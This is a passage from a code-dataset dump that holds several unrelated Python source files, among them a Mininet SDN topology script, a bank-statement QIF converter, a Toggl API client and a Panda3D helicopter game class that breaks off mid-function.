setLogLevel\n\n\nclass LinuxRouter(Node):\n \"A Node with IP forwarding enabled.\"\n\n def config(self, **params):\n super(LinuxRouter, self).config(**params)\n # Enable forwarding on the router\n self.cmd('sysctl net.ipv4.ip_forward=1')\n\n def terminate(self):\n self.cmd('sysctl net.ipv4.ip_forward=0')\n super(LinuxRouter, self).terminate()\n\n\ndef dnsNet():\n \"Create a network to test eth tof adapter\"\n\n net = Mininet(controller=Controller, switch=OVSSwitch)\n\n info(\"*** Creating switches\\n\")\n br_dns = net.addSwitch('br_dns', dpid='1')\n br_servers = net.addSwitch('br_servers', dpid='2')\n\n info(\"*** Creating hosts\\n\")\n info('*** Clients\\n')\n\n clients = []\n for i in range(0, 5):\n clients.append(net.addHost('cl' + str(i),\n ip='10.128.0.' + str(i + 1) + '/24',\n defaultRoute='via 10.128.0.254'))\n\n info('*** Router\\n')\n router = net.addHost('r0', cls=LinuxRouter, ip='10.128.0.254/24')\n\n info('*** Servers\\n')\n s0 = net.addHost('s0', ip='10.128.1.2/24', defaultRoute='via 10.128.1.1')\n s1 = net.addHost('s1', ip='10.128.1.3/24', defaultRoute='via 10.128.1.1')\n\n info('*** Creating the controller\\n')\n c1 = net.addController('c1', controller=RemoteController,\n ip='127.0.0.1', port=6653)\n\n info('*** Creating Links\\n')\n info('*** Hosts\\n')\n for client in clients:\n net.addLink(br_dns, client)\n\n info('*** Router\\n')\n net.addLink(br_dns, router, intfName2='r0-eth0',\n params2={'ip': '10.128.0.254/24'})\n net.addLink(br_servers, router, intfName2='r0-eth1',\n params2={'ip': '10.128.1.1/24'})\n\n info('*** Servers\\n')\n net.addLink(br_servers, s0)\n net.addLink(br_servers, s1)\n\n info(\"*** Starting network\\n\")\n net.build()\n br_servers.start([c1])\n br_dns.start([c1])\n\n info('*** Add flows\\n')\n br_servers.dpctl('add-flow', 'actions=OUTPUT:NORMAL')\n\n info('*** Starting HTTP Servers\\n')\n s0.cmd('sudo python -m SimpleHTTPServer 80 >& /tmp/http.log &')\n s1.cmd('sudo python -m SimpleHTTPServer 80 >& /tmp/http.log &')\n\n info(\"*** Running CLI\\n\")\n CLI(net)\n\n info(\"*** Stopping network\\n\")\n net.stop()\n\nif __name__ == '__main__':\n setLogLevel('info') # for CLI output\n dnsNet()\n","repo_name":"wnke/SDN_RYU_DNS","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32154399188","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Bout (read bank-out) extracts transactions from pdf bank statements.\n\n _ _\n(_) (_)\n(_) _ _ _ _ _ _ _ _ _ (_) _ _\n(_)(_)(_)(_)_ _ (_)(_)(_) _ (_) (_)(_)(_)(_)(_)\n(_) (_)(_) (_)(_) (_) (_)\n(_) (_)(_) (_)(_) (_) (_) _\n(_) _ _ _(_)(_) _ _ _ (_)(_)_ _ _(_)_ (_)_ _(_)\n(_)(_)(_)(_) (_)(_)(_) (_)(_)(_) (_) (_)(_)\n\n\"\"\"\nimport io\nimport logging\nimport click\nimport csv\nfrom collections import namedtuple\nfrom datetime import datetime\n\nlogger = logging.getLogger(\"bout\")\n\nprofiles = {}\nTransaction = namedtuple(\"Transaction\",\n [\"id\", \"date\", \"payee\", \"memo\", \"amount\"])\nInvalidTransaction = namedtuple(\"InvalidTransaction\", [])\n\n\ndef get_icici_csv(data_row):\n \"\"\"Convert a transaction row to tuple.\n\n Details of fields\n 0: 'D', # Transaction date\n 2: 'M', # Transaction details\n 3: 'T', # Deposit\n 4: 'T-', # Withdrawal\n \"\"\"\n logger.debug(\"get_icicicsv: Data row = {}\".format(data_row))\n date = data_row[0].replace('-', '/')\n if _valid_date(date):\n amt = \"-{}\".format(data_row[4])\n if data_row[3] != \"0\":\n amt = data_row[3]\n return Transaction(id=0,\n date=date,\n payee=\"\", # Empty for ICICI bank account\n memo=data_row[2],\n amount=amt)\n return InvalidTransaction()\n\n\ndef get_icicicc_csv(data_row):\n \"\"\"Convert a transaction row to tuple.\n\n Details of fields\n 0: 'D', # Transaction date\n 2: 'M', # Transaction details\n 5: 'T', # Amount\n \"\"\"\n logger.debug(\"get_icicicsv: Data row = {}\".format(data_row))\n date = data_row[0]\n if _valid_date(date, date_format=\"%d/%m/%Y\"):\n amt = \"-{}\".format(data_row[5])\n if data_row[6] == \"CR\":\n amt = data_row[5]\n return Transaction(id=0,\n date=date,\n payee=\"\", # Empty for ICICI bank account\n memo=data_row[2],\n amount=amt)\n return InvalidTransaction()\n\n\ndef qif_header():\n \"\"\"Print qif header.\"\"\"\n click.echo(\"!Account\\nNMyAccount\\nTMyBank\\n^\\n!Type:Bank\")\n\n\ndef to_qif(transaction):\n \"\"\"Transform a cleaned up row to qif format.\n\n Returns:\n string of a particular transaction in qif format\n\n See wikipedia for more details of QIF format.\n https://en.wikipedia.org/wiki/Quicken_Interchange_Format#Detail_items\n\n \"\"\"\n logger.debug(\"to_qif: Input = {}\".format(transaction))\n return \"D{0}\\nM{1}\\nT{2}\\n^\\n\\n\"\\\n .format(transaction.date, transaction.memo, transaction.amount)\n\n\ndef _valid_date(date_value, date_format=\"%d/%m/%Y\"):\n \"\"\"Validate a transaction date.\"\"\"\n try:\n transaction_date = datetime.strptime(date_value, date_format)\n return transaction_date is not None\n except ValueError:\n return False\n\n\ndef _filter_csv_header(doc, header):\n head_skip = False\n mem = io.StringIO()\n with open(doc, encoding='utf-8', mode='r') as f:\n for line in f:\n if line.startswith(header):\n head_skip = True\n continue\n if head_skip and (not line or line.isspace()):\n break\n if head_skip and ',' in line:\n mem.write(line)\n mem.seek(0)\n return csv.reader(mem)\n\n\n@click.command()\n@click.argument(\"doc\", type=click.Path(exists=True))\n@click.option(\"--profile\", prompt=\"Choose a profile\", default=\"icici\",\n show_default=True,\n type=click.Choice([\"icici\", \"icicicc\"]),\n help=\"Document type profile.\")\n@click.option(\"--debug\", is_flag=True, show_default=True,\n help=\"Show diagnostic messages.\")\ndef start(doc, profile, debug):\n \"\"\"Bout (read bank-out) extracts transactions from csv bank statements.\"\"\"\n if debug:\n logging.basicConfig(level=logging.DEBUG)\n logger.info(\"Verbose messages are enabled.\")\n\n profiles.update({\"icici\": get_icici_csv,\n \"icicicc\": get_icicicc_csv})\n\n rows = []\n if profile == \"icici\":\n header = \"DATE,MODE,PARTICULARS,DEPOSITS,WITHDRAWALS,BALANCE\"\n rows = _filter_csv_header(doc, header)\n elif profile == \"icicicc\":\n header = \"Date,Sr.No.,Transaction Details,Reward Point Header,Intl.Amount,Amount(in Rs),BillingAmountSign\"\n rows = _filter_csv_header(doc, header)\n\n # row -> clean_row\n # clean_row, profile -> transaction\n # transaction -> qif\n create_transaction = profiles[profile]\n print_header = False\n for r in rows:\n transaction = create_transaction(r)\n if type(transaction) is not InvalidTransaction:\n if not print_header:\n qif_header()\n print_header = True\n click.echo(to_qif(transaction))\n\n\nif __name__ == '__main__':\n start()\n","repo_name":"codito/bout","sub_path":"bout.py","file_name":"bout.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"18455364460","text":"import numpy as np\nimport h5py\nfrom sklearn.model_selection import train_test_split\n\nclass CreateDatasetPackage():\n def __init__(self, filename, dataset_name = \"FullData\", keys=[\"X\", \"Y\"]):\n \"\"\"\n Creates a new dataset h5 file with train, test and validation datasets with\n the requested shape\n Parameters\n ----------\n filename : name of the file\n dataset_name : key name in the h5 file\n keys : keys inside dataset_name\n \"\"\"\n self._filename = filename\n self._dataset_name = dataset_name\n self._array = {}\n self._keys = [\"X\", \"Y\"]\n self.train = {}\n self.test = {}\n self.valid = {}\n\n with h5py.File(filename, \"r\") as h5_f:\n for index, name in zip(self._keys, keys):\n key = f\"{self._dataset_name}/{name}\"\n\n if key not in h5_f:\n raise LookupError(f\"Data {key} is not available\")\n\n self._array[index] = np.array(h5_f[key])\n\n def modify_shape(self, new_sample_shape):\n \"\"\"\n Modify the shape of the input samples X\n Parameters\n ----------\n new_sample_shape\n\n Returns\n -------\n\n \"\"\"\n for key, shape in zip(self._array.keys(), new_sample_shape):\n if shape is not None:\n sample_size = (self._array[key].shape[0],)\n self._array[key] = self._array[key].reshape((sample_size + shape))\n\n def split(self, validation_split = 0.1, test_split = 0.1):\n \"\"\"\n Split the dataset into train, test and valid sets given the percentage\n Parameters\n ----------\n validation_split : percentage of the dataset used for validation\n test_split : percentage of the dataset used for test\n\n Returns\n -------\n\n \"\"\"\n X_train, X_test, Y_train, Y_test = train_test_split(self._array[\"X\"], self._array[\"Y\"], test_size=test_split)\n X_train, X_valid, Y_train, Y_valid = train_test_split(X_train, Y_train, test_size=validation_split)\n\n self.train = {\"X\": X_train, \"Y\":Y_train}\n self.valid = {\"X\": X_valid, \"Y\":Y_valid}\n self.test = {\"X\": X_test, \"Y\": Y_test}\n\n def save(self, filename=\"data.h5\"):\n with h5py.File(filename, \"w\") as h5_f:\n main_group = h5_f.create_group(\"data\")\n sub_g1 = main_group.create_group('train')\n sub_g2 = main_group.create_group('valid')\n sub_g3 = main_group.create_group('test')\n\n sub_g1.create_dataset(\"samples\", data=self.train[\"X\"])\n sub_g1.create_dataset(\"labels\", data=self.train[\"Y\"])\n\n sub_g2.create_dataset(\"samples\", data=self.test[\"X\"])\n sub_g2.create_dataset(\"labels\", data=self.test[\"Y\"])\n\n sub_g3.create_dataset(\"samples\", data=self.valid[\"X\"])\n sub_g3.create_dataset(\"labels\", data=self.valid[\"Y\"])\n\n def get_class_probability(self, verbose=True):\n\n def get_label_probability(labels):\n each_class = np.sum(labels, axis=0)\n total = np.sum(each_class)\n\n class_probability = each_class / total\n inverse_class_proability = class_probability ** -1\n\n return class_probability, inverse_class_proability\n\n class_probability = {}\n inverse_class_proability = {}\n class_probability[\"train\"], inverse_class_proability[\"train\"] = get_label_probability(self.train[\"Y\"])\n class_probability[\"valid\"], inverse_class_proability[\"valid\"] = get_label_probability(self.valid[\"Y\"])\n class_probability[\"test\"], inverse_class_proability[\"test\"] = get_label_probability(self.test[\"Y\"])\n\n return class_probability, inverse_class_proability\n\n\nif __name__ == \"__main__\":\n file = \"example.h5\"\n\n dp = CreateDatasetPackage(filename=file, dataset_name = \"FullData\", keys=[\"X_full\", \"y_full\"])\n\n dp.modify_shape([(64, 64, 1)])\n dp.split()\n dp.save()\n\n class_probability, inverse_class_proability = dp.get_class_probability()\n\n for (key_cp, val_cp), (key_icp, val_icp) in zip(class_probability.items(), inverse_class_proability.items()):\n print(f\"Class Probability {key_cp} : {val_cp}\")\n print(f\"Inverse Class Probability {key_icp} : {val_icp}\")\n","repo_name":"CuriousSingularity/ai","sub_path":"data_preprocessor/data_formatter.py","file_name":"data_formatter.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70441684568","text":"from multiprocessing import Process\nfrom os import getpid\nfrom random import randint\nfrom time import time, sleep\n\ndef download_task(filename):\n print('开始下载{}...'.format(filename))\n time_to_download = randint(5, 10)\n sleep(time_to_download)\n print('{}下载完成! 总共耗费了{}s'.format(filename, time_to_download))\n\ndef main():\n start = time()\n P1 = Process(target = download_task, args=('Python从入门到住院.pdf', ))\n P1.start()\n P2 = Process(target = download_task, args=('Peking Hot.avi', ))\n P2.start()\n P1.join()\n P2.join()\n end = time()\n print('总共耗费了{:.2f}s'.format(end - start))\n\nif __name__ == '__main__':\n main()\n","repo_name":"Yao-Phoenix/day_code","sub_path":"download_process.py","file_name":"download_process.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3768765997","text":"class Car:\n name = \"\"\n color = \"\"\n price = \"20 million $\"\n\n def start():\n print(\"Starting the engine\")\n\n\nCar.name = \"Tesla\"\nCar.color = \"black\"\n\nprint(\"Name of the car:\", Car.name)\nprint(\"Color :\", Car.color)\nprint(\"Price :\", Car.price)\n\nCar.start()\n","repo_name":"himu999/Python_oop","sub_path":"D.object_And_class/c_class_creating_with_changeable_attribute.py","file_name":"c_class_creating_with_changeable_attribute.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8136209642","text":"from cx_Freeze import setup, Executable\nimport os\nimport sys\n\nbase = None \n\nexecutables = [Executable(\"main.py\", base=base)]\n\nPYTHON_INSTALL_DIR = os.path.dirname(os.path.dirname(os.__file__))\nos.environ['TCL_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR,'tcl','tcl8.6')\nos.environ['TK_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tk8.6')\npackages = [\"idna\", \"pyglet\", \"math\", \"random\",\"numpy\",\"config\",\"cvsmr\",\"core\",\"cvsmm\",\"cvsms\",\"cvsmgmt\",\"tripy\",\"calculations\", \"time\"]\noptions = {\n 'build_exe': { \n 'packages':packages,\n 'include_files': [\"C:/Users/Austa Jiang/AppData/Local/Programs/Python/Python36-32/DLLs/tcl86t.dll\", \"C:/Users/Austa Jiang/AppData/Local/Programs/Python/Python36-32/DLLs/tk86t.dll\"]\n }, \n}\n\nsetup(\n name = \"\",\n options = options,\n version = \"\",\n description = '',\n executables = executables\n)\n","repo_name":"austalavista/civsim","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6581803816","text":"import feedparser\nimport operator\nimport Utils.Time\n# Obtenemos las noticias a través del RSS\n\n\ndef getrss(url):\n feed = feedparser.parse(url)\n feed[\"entries\"].sort(key=operator.itemgetter('date'))\n return feed\n\n\ndef getrssdays(feed):\n days = []\n for i in range(0, len(feed['entries'])):\n currentpost = feed['entries'][i]\n postdate = Utils.Time.formatTime((currentpost['date_parsed']))\n if postdate not in days:\n days.append(postdate)\n days.sort()\n return days\n\n\n\ndef getdayposts(feed, dayformatted):\n posts = []\n numposts = 0\n for i in range(0, len(feed['entries'])):\n currentpost = feed['entries'][i]\n postdate = Utils.Time.formatTime(currentpost['date_parsed'])\n if dayformatted == postdate:\n posts.append({\n 'title': currentpost.title,\n 'description': currentpost.summary,\n 'url': currentpost.link,\n })\n numposts += 1\n return posts\n","repo_name":"gonzarugil/BD","sub_path":"Utils/Rss.py","file_name":"Rss.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1445305305","text":"import utilities\nfrom urllib.request import Request, urlopen\nfrom urllib.error import URLError, HTTPError\nfrom base64 import b64encode\n\n\n# References https://developers.track.toggl.com/docs/authentication/index.html#http-basic-auth-with-api-token\ndef generateRequestHeader(apiToken:str):\n return {'content-type': 'application/json', 'Authorization' : 'Basic %s' % b64encode(f\"{apiToken}:api_token\".encode(\"ascii\")).decode(\"ascii\")}\n\ndef _makeRequestReturnJsonDict(url:str, requestHeader:dict):\n print(url, requestHeader)\n req = Request(url)\n for header in requestHeader:\n req.add_header(header, requestHeader[header])\n try:\n data = urlopen(req).read()\n data = utilities.jsonToDict(data)\n except URLError as e:\n print(e.reason)\n if isinstance(e, HTTPError):\n print(e.read().decode())\n raise e\n \n return data\n\n\ndef getAllProjects(apiEndpoint:str, requestHeader:dict):\n return _makeRequestReturnJsonDict(f\"{apiEndpoint}/me/projects\", requestHeader=requestHeader)\n \ndef getAllTimeEntries(apiEndpoint:str,startDateEpoch:int,endDateEpoch:int, requestHeader:dict):\n startDate = utilities.epochToYYYY_MM_DDString(startDateEpoch)\n endDate = utilities.epochToYYYY_MM_DDString(endDateEpoch)\n return _makeRequestReturnJsonDict(\n f\"{apiEndpoint}/me/time_entries?start_date={startDate}&end_date={endDate}\",\n requestHeader=requestHeader\n )","repo_name":"shehabattia96/togglToInvoice","sub_path":"toggl.py","file_name":"toggl.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8450985292","text":"from enum import Enum\n\n\nclass ActivityCategoryType(str, Enum):\n # DIRECT\n STATIONARY_COMBUSTION = \"STATIONARY_COMBUSTION\"\n MOBILE_COMBUSTION = \"MOBILE_COMBUSTION\"\n PROCESS_EMISSIONS = \"PROCESS_EMISSIONS\"\n FUGITIVE_EMISSIONS = \"FUGITIVE_EMISSIONS\"\n\n # ELECTRICITY\n PURCHASED_ELECTRICITY = \"PURCHASED_ELECTRICITY\"\n PURCHASED_STEAM_HEAT_COOLING = \"PURCHASED_STEAM_HEAT_COOLING\"\n\n # UPSTREAM\n PURCHASED_GOODS_AND_SERVICES = \"PURCHASED_GOODS_AND_SERVICES\"\n CAPITAL_GOODS = \"CAPITAL_GOODS\"\n FUEL_AND_ENERGY_RELATED_ACTIVITIES = \"FUEL_AND_ENERGY_RELATED_ACTIVITIES\"\n UPSTREAM_TRANSPORT_AND_DISTRIBUTION = \"UPSTREAM_TRANSPORT_AND_DISTRIBUTION\"\n WASTE_GENERATED_IN_OPERATIONS = \"WASTE_GENERATED_IN_OPERATIONS\"\n BUSINESS_TRAVEL = \"BUSINESS_TRAVEL\"\n EMPLOYEE_COMMUTING = \"EMPLOYEE_COMMUTING\"\n UPSTREAM_LEASED_ASSETS = \"UPSTREAM_LEASED_ASSETS\"\n\n # DOWNSTREAM\n DOWNSTREAM_TRANSPORT_AND_DISTRIBUTION = \"DOWNSTREAM_TRANSPORT_AND_DISTRIBUTION\"\n PROCESSING_OF_SOLD_PRODUCTS = \"PROCESSING_OF_SOLD_PRODUCTS\"\n USE_OF_SOLD_PRODUCTS = \"USE_OF_SOLD_PRODUCTS\"\n END_OF_LIFE_OF_SOLD_PRODUCTS = \"END_OF_LIFE_OF_SOLD_PRODUCTS\"\n DOWNSTREAM_LEASED_ASSETS = \"DOWNSTREAM_LEASED_ASSETS\"\n FRANCHISES = \"FRANCHISES\"\n INVESTMENTS = \"INVESTMENTS\"\n\n # OTHERS\n CUSTOM = \"CUSTOM\"\n","repo_name":"CarbonAltDelete/carbonaltdelete-client","sub_path":"carbon_alt_delete/activities/schemas/activity_category_type.py","file_name":"activity_category_type.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73891263768","text":"from typing import Tuple\r\nfrom panda3d.core import LVector3, LQuaternionf, LineSegs, NodePath\r\nfrom direct.actor.Actor import Actor\r\nimport pymunk\r\nfrom input import InputManager\r\nfrom utils import clamp, not_zero, radians_to_degrees, damp, move_towards, slerp, almost_zero, Direction\r\nfrom masks import CATEGORY_PLAYER, CATEGORY_WALL\r\nimport math\r\n\r\nimport weapons\r\nimport masks\r\nimport utils\r\n\r\nMAX_DIST_TO_GROUND = 200\r\n\r\nclass Chopper:\r\n width: float = 3.2\r\n hull_top: float = 1.25\r\n hull_mid: float = -0.25\r\n hull_floor: float = -1.0\r\n\r\n skid_floor: float = -1.5\r\n skid_height: float = 0.5\r\n\r\n rotor_floor: float = 1.5\r\n rotor_height: float = 0.25\r\n rotor_radius: float = 1.5\r\n\r\n scale: float = 1.0\r\n direction: Direction = Direction.RIGHT\r\n scene: \"scene.Scene\"\r\n space: pymunk.Space\r\n\r\n rescued: int = 0\r\n capacity: int = 4\r\n\r\n def __init__(self, scene: \"scene.Scene\", spawn_point: Tuple[float, float]):\r\n width, scale = self.width, self.scale\r\n space = scene.space\r\n self.spawn_point = spawn_point\r\n self.distance_to_ground = -1\r\n self.scene = scene\r\n self.space = space\r\n self.app = scene.app\r\n self.input = scene.app.input\r\n self.rescued = 0\r\n self.capacity = 4\r\n self.hp = 10\r\n self.team = 1\r\n self.flip_heading_t = 0\r\n self.flip_heading = False\r\n self.bodyNode = Actor(\"art/space-chopper/space-chopper.glb\")\r\n self.bodyNode.reparentTo(scene.root)\r\n self.bodyNode.loop(\"blade\")\r\n\r\n self.bodyNode.setShaderAuto()\r\n self.bodyNode.setTextureOff(1)\r\n for material in self.bodyNode.findAllMaterials():\r\n print(material)\r\n\r\n # self.shadowNode = self.bodyNode.attachNewNode(LensNode('shadowproj'))\r\n # #lens = PerspectiveLens()\r\n # lens = PerspectiveLens()\r\n # lens.setNearFar(1, 5)\r\n # self.shadowNode.node().setLens(lens)\r\n # self.shadowNode.node().showFrustum()\r\n # self.shadowNode.setHpr(0, -90, 0)\r\n # self.shadowNode.find('frustum').setColor(1, 0, 0, 1)\r\n # self.shadowNode.reparentTo(self.bodyNode)\r\n # self.shadowNode.setPos(0, 0, self.height)\r\n\r\n # tex = app.loader.loadTexture('art/space-chopper/shadow.png')\r\n # tex.setWrapU(SamplerState.WMBorderColor)\r\n # tex.setWrapV(SamplerState.WMBorderColor)\r\n # tex.setBorderColor((1, 1, 1, 0))\r\n # ts = TextureStage('ts')\r\n # ts.setSort(1)\r\n # ts.setColor((0.5, 0.5, 0.5, 0.5))\r\n # ts.setMode(TextureStage.MCombine)\r\n # ts.setCombineRgb(\r\n # TextureStage.CMInterpolate, \r\n # TextureStage.CSTexture, \r\n # TextureStage.COSrcColor,\r\n # TextureStage.CSPrevious,\r\n # TextureStage.COSrcColor,\r\n # TextureStage.CSTexture,\r\n # TextureStage.COOneMinusSrcColor\r\n # )\r\n # scene.worldNP.projectTexture(ts, tex, self.shadowNode)\r\n\r\n \r\n #self.roterNode = base.loader.loadModel(\"models/Roter.stl\")\r\n #self.roterNode.reparentTo(self.bodyNode)\r\n\r\n self.body = pymunk.Body(5, 100)\r\n self.body.position = self.spawn_point\r\n\r\n # hull\r\n hull_vertices = [\r\n (-width*scale, self.hull_mid*scale), \r\n (0, self.hull_floor*scale), \r\n (width*scale, self.hull_mid*scale), \r\n (0, self.hull_top*scale)\r\n ]\r\n self.hull_shape = pymunk.Poly(self.body, hull_vertices)\r\n self.hull_shape.friction = 0.5\r\n self.hull_shape.filter = pymunk.ShapeFilter(categories=CATEGORY_PLAYER)\r\n self.hull_shape.collision_type = CATEGORY_PLAYER\r\n self.hull_shape.data = self\r\n \r\n # skids\r\n skid_vertices = [\r\n (-width*scale, self.skid_floor*scale), \r\n ( width*scale, self.skid_floor*scale), \r\n ( width*scale, (self.skid_floor + self.skid_height)*scale), \r\n (-width*scale, (self.skid_floor + self.skid_height)*scale)\r\n ]\r\n self.skid_shape = pymunk.Poly(self.body, skid_vertices)\r\n self.skid_shape.friction = 0.5\r\n self.skid_shape.filter = pymunk.ShapeFilter(categories=CATEGORY_PLAYER)\r\n self.skid_shape.collision_type = CATEGORY_PLAYER\r\n self.skid_shape.data = self\r\n\r\n # rotor\r\n rotor_vertices = [\r\n (-self.rotor_radius*scale, self.rotor_floor*scale), \r\n ( self.rotor_radius*scale, self.rotor_floor*scale), \r\n ( self.rotor_radius*scale, (self.rotor_floor + self.rotor_height)*scale), \r\n (-self.rotor_radius*scale, (self.rotor_floor + self.rotor_height)*scale)\r\n ]\r\n self.rotor_shape = pymunk.Poly(self.body, rotor_vertices)\r\n self.rotor_shape.friction = 0.5\r\n self.rotor_shape.filter = pymunk.ShapeFilter(categories=CATEGORY_PLAYER)\r\n self.rotor_shape.collision_type = CATEGORY_PLAYER\r\n self.rotor_shape.data = self\r\n \r\n space.add(self.body, self.hull_shape, self.skid_shape, self.rotor_shape)\r\n\r\n self.weapons = [weapons.MachineGun(self.scene), weapons.RocketLauncher(self.scene)]\r\n\r\n self.snd = scene.app.loader.loadSfx(\"sound/571629__ugila__item-pickup.wav\")\r\n self.crash_snd = scene.app.loader.loadSfx(\"sound/587184__derplayer__explosion-02.wav\")\r\n \r\n self.debug_lines = LineSegs()\r\n self.debug_lines.setColor(1, 0, 0, 1)\r\n def draw_shape(vertices):\r\n self.debug_lines.moveTo(vertices[0][0], 0, vertices[0][1])\r\n for v in vertices[1:]:\r\n self.debug_lines.drawTo(v[0], 0, v[1])\r\n self.debug_lines.drawTo(vertices[0][0], 0, vertices[0][1])\r\n\r\n draw_shape(hull_vertices)\r\n draw_shape(skid_vertices)\r\n draw_shape(rotor_vertices)\r\n\r\n self.debug_lines.setThickness(4)\r\n self.debug_line_node = self.debug_lines.create()\r\n self.debug_line_np = NodePath(self.debug_line_node)\r\n self.debug_line_np.reparentTo(self.bodyNode)\r\n self.debug_line_np.setHpr(90, 0, 0)\r\n\r\n self.debug_line_np.hide()\r\n\r\n # self.dust_particles = ParticleEffect()\r\n # self.dust_particles.loadConfig(Filename(\"./art/effects/dust.ptf\"))\r\n # self.dust_particles.clearLight()\r\n # #self.dust_particles.start(scene.app.render)\r\n # self.dust_particles_active = False\r\n #\r\n # self.particles = Particles()\r\n # self.particles.setFactory(\"PointParticleFactory\")\r\n # self.particles.setRenderer(\"SpriteParticleRenderer\")\r\n # self.particles.setEmitter(\"SphereVolumeEmitter\")\r\n\r\n def destroy(self):\r\n self.space.remove(self.body, self.hull_shape, self.skid_shape, self.rotor_shape)\r\n self.bodyNode.cleanup()\r\n self.bodyNode.remove_node()\r\n\r\n def is_full(self) -> bool:\r\n return self.rescued >= self.capacity\r\n\r\n def velocity(self) -> float:\r\n return self.body.velocity.length\r\n\r\n def update(self, dt: float):\r\n im: InputManager = self.input\r\n\r\n # ground_intersection = self.ground_intersection(15)\r\n # if ground_intersection:\r\n # if not self.dust_particles_active:\r\n # self.dust_particles = ParticleEffect()\r\n # self.dust_particles.loadConfig(Filename(\"./art/effects/dust.ptf\"))\r\n # self.dust_particles.start(self.scene.app.render)\r\n # self.dust_particles_active = True\r\n # self.dust_particles.setPos(ground_intersection.point.x, 0.000, ground_intersection.point.y)\r\n # else:\r\n # if self.dust_particles_active:\r\n # self.dust_particles.softStop()\r\n # self.dust_particles_active = False\r\n\r\n if not_zero(im.throttle()):\r\n self.body.apply_force_at_local_point((0, 200 * im.throttle()), (0, 0))\r\n\r\n self.bodyNode.setPlayRate(5.0 + 15 * im.throttle(), \"blade\")\r\n\r\n if im.is_booster_rocket_pressed():\r\n self.body.apply_force_at_local_point((self.direction.value * 200, 0), (0, 0))\r\n \r\n if im.is_reverse_booster_rocket_pressed():\r\n self.body.apply_force_at_local_point((-self.direction.value * 200, 0), (0, 0))\r\n\r\n if im.is_face_left_pressed() and self.direction != Direction.LEFT:\r\n self.direction = Direction.LEFT\r\n self.flip_heading_t = 0\r\n self.flip_heading = True\r\n elif im.is_face_right_pressed() and self.direction != Direction.RIGHT:\r\n self.direction = Direction.RIGHT\r\n self.flip_heading_t = 0\r\n self.flip_heading = True\r\n\r\n if im.chopper_reset:\r\n im.chopper_reset = False\r\n self.reset()\r\n\r\n self.weapons[im.weapon_selection].update(dt)\r\n\r\n if im.fire_pressed:\r\n self.weapons[im.weapon_selection].fire(self, self.direction)\r\n\r\n if not_zero(im.pitch_axis()):\r\n self.body.apply_force_at_world_point((10 * im.pitch_axis(), 0), (self.body.position.x, self.body.position.y))\r\n self.body.apply_force_at_local_point((0, 200 * im.pitch_axis()), (-self.width, 0))\r\n self.body.apply_force_at_local_point((0, -200 * im.pitch_axis()), (self.width, 0))\r\n\r\n self.distance_to_ground = self.calculate_distance_to_ground()\r\n\r\n # if self.distance_to_ground > 50:\r\n # self.body.apply_force_at_world_point((0, (self.distance_to_ground / MAX_DIST_TO_GROUND) * -200.0), (self.body.position.x, self.body.position.y))\r\n # if self.distance_to_ground == -1:\r\n # self.body.apply_force_at_world_point((0, -200.0), (self.body.position.x, self.body.position.y))\r\n\r\n if self.distance_to_ground > 100 and self.body.velocity.y > 0:\r\n self.body.velocity = self.body.velocity.x, damp(self.body.velocity.y, 0.05, dt)\r\n self.body.apply_force_at_world_point((0, -8), (self.body.position.x, self.body.position.y))\r\n\r\n #damping_rate = 1.0 - clamp(self.velocity() / 100, 0, 1)\r\n #self.body.velocity = damp(self.body.velocity, damping_rate, dt)\r\n self.body.angular_velocity = damp(self.body.angular_velocity, 0.15, dt)\r\n\r\n self.pos = self.body.position\r\n rot = self.body.angle\r\n\r\n while rot < 0:\r\n rot += math.pi * 2\r\n while rot > math.pi * 2:\r\n rot -= math.pi * 2\r\n\r\n self.body.angle = rot\r\n\r\n self.bodyNode.setPos(self.pos.x, 0, self.pos.y)\r\n\r\n\r\n if self.flip_heading:\r\n if self.flip_heading_t >= 1.0:\r\n self.flip_heading_t = 1.0\r\n self.flip_heading = False\r\n\r\n src_rotation = LQuaternionf()\r\n src_rotation.setHpr(LVector3(90 * -self.direction.value, radians_to_degrees(rot) * self.direction.value, 0))\r\n target_rotation = LQuaternionf()\r\n target_rotation.setHpr(LVector3(90 * self.direction.value, -radians_to_degrees(rot) * self.direction.value, 0))\r\n self.bodyNode.setQuat(slerp(src_rotation, target_rotation, self.flip_heading_t))\r\n self.flip_heading_t = move_towards(self.flip_heading_t, 1.0, 5.0, dt)\r\n else:\r\n self.bodyNode.setHpr(LVector3(90 * self.direction.value, -radians_to_degrees(rot) * self.direction.value, 0))\r\n\r\n def ground_intersection(self, dist):\r\n segment_query_info_list = self.space.segment_query((self.body.position.x, self.body.position.y), (self.body.position.x, self.body.position.y - dist), 0.1, pymunk.ShapeFilter(mask=CATEGORY_WALL))\r\n segment_query_info_list.sort(key=lambda x: x.alpha)\r\n if len(segment_query_info_list) == 0: return None\r\n return segment_query_info_list[0]\r\n\r\n def calculate_distance_to_ground(self):\r\n segment_query_info_list = self.space.segment_query((self.body.position.x, self.body.position.y), (self.body.position.x, self.body.position.y - MAX_DIST_TO_GROUND), 0.1, pymunk.ShapeFilter(mask=CATEGORY_WALL))\r\n 